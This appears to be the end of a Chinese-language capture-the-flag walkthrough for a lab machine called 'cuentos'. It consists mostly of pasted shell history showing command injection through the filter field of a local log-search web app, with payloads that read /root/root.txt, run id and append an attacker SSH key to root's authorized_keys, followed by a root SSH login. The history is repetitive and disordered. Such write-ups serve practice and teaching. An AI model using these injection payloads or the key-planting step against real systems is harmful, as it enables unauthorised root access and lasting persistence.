/root/.ssh ; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLNGlNDGOVKJ9RSumEEtGyfxM21ZlUvzYf6EY05qPO9TJaDsShheOFClWLXmZMucXqUbHtt+5ZLEUmi9XcEKkaaaUMN0TNmOaovRXL9M+r2JDCyWaJZjNVZmsb5Nr+MzMY5v1QV1vmjyEFE9q0DK6evN9pYUZ1cpZ6f5eZoFh5uJJtX0UaNxira0sJFoxXosdUFjfhv4XsstCeSjqFcLBO64efzsrHXhuoeWg3BgDZ2tqUA/wxZSZAu7HnUVIhToBl4Rpt99W1PybX3xaPbDoQpZe5Gi+8lf0AYuWf3EiH4zPr3+uFwkYozFeM7R+cvSUmIhwoCjVyQAp4bthRmy8S+ssFG9uoAqIWLY3j9RRwzCrIm8drl8FjFOs6jVkqT9Pi+1UQjEBeUEnCzrb17pNn+EWX+wvE/z5QmMI+qzvw/V3EqGPrccv6ZxdsGtRF10dzNV5pFJlXNA6sCBiWRNeKPrr00j0go5bjxqySzirytfyle7JxRo0aGDVfLE8HqUc= root@kali' >> /root/.ssh/authorized_keys #" curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p /root/.ssh ; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLNGlNDGOVKJ9RSumEEtGyfxM21ZlUvzYf6EY05qPO9TJaDsShheOFClWLXmZMucXqUbHtt+5ZLEUmi9XcEKkaaaUMN0TNmOaovRXL9M+r2JDCyWaJZjNVZmsb5Nr+MzMY5v1QV1vmjyEFE9q0DK6evN9pYUZ1cpZ6f5eZoFh5uJJtX0UaNxira0sJFoxXosdUFjfhv4XsstCeSjqFcLBO64efzsrHXhuoeWg3BgDZ2tqUA/wxZSZAu7HnUVIhToBl4Rpt99W1PybX3xaPbDoQpZe5Gi+8lf0AYuWf3EiH4zPr3+uFwkYozFeM7R+cvSUmIhwoCjVyQAp4bthRmy8S+ssFG9uoAqIWLY3j9RRwzCrIm8drl8FjFOs6jVkqT9Pi+1UQjEBeUEnCzrb17pNn+EWX+wvE/z5QmMI+qzvw/V3EqGPrccv6ZxdsGtRF10dzNV5pFJlXNA6sCBiWRNeKPrr00j0go5bjxqySzirytfyle7JxRo0aGDVfLE8HqUc= root@kali ' >> /root/.ssh/authorized_keys #" ls -l ls -la cat .bash_history exit id sudo -l exit ls -al cd ls -al cat .bash_history ss -lunpt ls -al /tmp/ url -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' -L curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13'curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #" curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #" cat /tmp/cookies.txt curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #" curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; id #" curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; id #" curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' rm /tmp/cookies.txt curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' cat /tmp/cookies.txt curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d 'filter=' ; id #' curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p /root/.ssh ; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLNGlNDGOVKJ9RSumEEtGyfxM21ZlUvzYf6EY05qPO9TJaDsShheOFClWLXmZMucXqUbHtt+5ZLEUmi9XcEKkaaaUMN0TNmOaovRXL9M+r2JDCyWaJZjNVZmsb5Nr+MzMY5v1QV1vmjyEFE9q0DK6evN9pYUZ1cpZ6f5eZoFh5uJJtX0UaNxira0sJFoxXosdUFjfhv4XsstCeSjqFcLBO64efzsrHXhuoeWg3BgDZ2tqUA/wxZSZAu7HnUVIhToBl4Rpt99W1PybX3xaPbDoQpZe5Gi+8lf0AYuWf3EiH4zPr3+uFwkYozFeM7R+cvSUmIhwoCjVyQAp4bthRmy8S+ssFG9uoAqIWLY3j9RRwzCrIm8drl8FjFOs6jVkqT9Pi+1UQjEBeUEnCzrb17pNn+EWX+wvE/z5QmMI+qzvw/V3EqGPrccv6ZxdsGtRF10dzNV5pFJlXNA6sCBiWRNeKPrr00j0go5bjxqySzirytfyle7JxRo0aGDVfLE8HqUc= root@kali' >> /root/.ssh/authorized_keys #" curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p /root/.ssh ; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLNGlNDGOVKJ9RSumEEtGyfxM21ZlUvzYf6EY05qPO9TJaDsShheOFClWLXmZMucXqUbHtt+5ZLEUmi9XcEKkaaaUMN0TNmOaovRXL9M+r2JDCyWaJZjNVZmsb5Nr+MzMY5v1QV1vmjyEFE9q0DK6evN9pYUZ1cpZ6f5eZoFh5uJJtX0UaNxira0sJFoxXosdUFjfhv4XsstCeSjqFcLBO64efzsrHXhuoeWg3BgDZ2tqUA/wxZSZAu7HnUVIhToBl4Rpt99W1PybX3xaPbDoQpZe5Gi+8lf0AYuWf3EiH4zPr3+uFwkYozFeM7R+cvSUmIhwoCjVyQAp4bthRmy8S+ssFG9uoAqIWLY3j9RRwzCrIm8drl8FjFOs6jVkqT9Pi+1UQjEBeUEnCzrb17pNn+EWX+wvE/z5QmMI+qzvw/V3EqGPrccv6ZxdsGtRF10dzNV5pFJlXNA6sCBiWRNeKPrr00j0go5bjxqySzirytfyle7JxRo0aGDVfLE8HqUc= root@kali ' >> /root/.ssh/authorized_keys #" ls -l ls -la cat .bash_history exit
然后就跟着这个命令进行上传ssh密钥提权就是了!
churrumais@cuentos:~$ curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p /root/.ssh ; echo '
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD3A8EGE0C+xZK2X6gWiTbuNq6QkIA/Zj/TN7qcBUvJUkxLNMiK3orFoTJUiCmAFW4Bx1qVYRks9HmQt8/ubbqIhmCNczcY+rNwfA8oG3sA4PK56/f5yB8KXJxTBG3m5iieKxZFA1IqLYZwSnZ6SGejYOZZvasDWvW6Y8aiQyhQQYAh0WUKR+msXZ5tuPepr7Ewa4neYKebEMaC5RNi+kdi0dX8e4MP8HG6BjgkK09UVPGy9VD5fQo5OMv+t7bQQqTMKAHVmCZatTeuGc4XCR6F/LdjFQza5+FIEUaQjMyooE7GpzLDi1cBwdOcKt4RaThW3Pn/Ikod6SQ/S+DDrUITEyYuVwsURN0hmwckeAv3km//Lpc01imMLDj5kojWpWifusoBDOCnFgnwd2wz3OxbYpU69dWrTiCc+ex6S7YuUwWTM2qhqqWodnB1eJHdQfcQzjiV4id21up9LGm5Rn1yEeEuW+nJvwrH2MwrFuVfWO3FvJ0PdYbWPS8ausSHa9c= root@kali ' >> /root/.ssh/authorized_keys #"
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>LogAnalyzer Pro</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
background-color: #f8f9fa;
padding-top: 20px;
}
.container {
max-width: 1200px;
}
pre {
background-color: #f8f9fa;
padding: 15px;
border-radius: 5px;
overflow-x: auto;
}
.navbar-brand {
font-weight: bold;
}
</style>
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-dark mb-4">
<div class="container">
<a class="navbar-brand" href="/dashboard">LogAnalyzer Pro v1.0</a>
.......................................
.......................................
.......................................
.......................................
templates/login.html: </div>
templates/login.html: <div class="mb-3">
templates/login.html: <label for="password" class="form-label">Password</label>
templates/login.html: <input type="password" class="form-control" id="password" name="password" required>
templates/login.html: </div>
templates/login.html: <button type="submit" class="btn btn-primary w-100">Iniciar Sesión</button>
templates/login.html: </form>
templates/login.html: </div>
templates/login.html: </div>
templates/login.html: </div>
templates/login.html:</body>
templates/login.html:</html>
</code></pre>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>
成功了后就直接ssh登录root就ok了
┌──(root㉿kali)-[/etc/ssh] └─# ssh root@192.168.81.61 -i ssh_host_rsa_key ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Introducing Expanded Security Maintenance for Applications. Receive updates to over 25,000 software packages with your Ubuntu Pro subscription. Free for personal use. https://ubuntu.com/pro Expanded Security Maintenance for Infrastructure is not enabled. 0 updates can be applied immediately. Enable ESM Infra to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update New release '22.04.5 LTS' available. Run 'do-release-upgrade' to upgrade to it. Your Hardware Enablement Stack (HWE) is supported until April 2025. Last login: Sat Jan 3 09:44:05 2026 from 192.168.81.26 root@cuentos:~# id uid=0(root) gid=0(root) groups=0(root)
就此结束了!!!!!!!!!!!
有“AI”的1024 = 2048,欢迎大家加入2048 AI社区
更多推荐
19
0- 0
已为社区贡献1条内容
所有评论(0)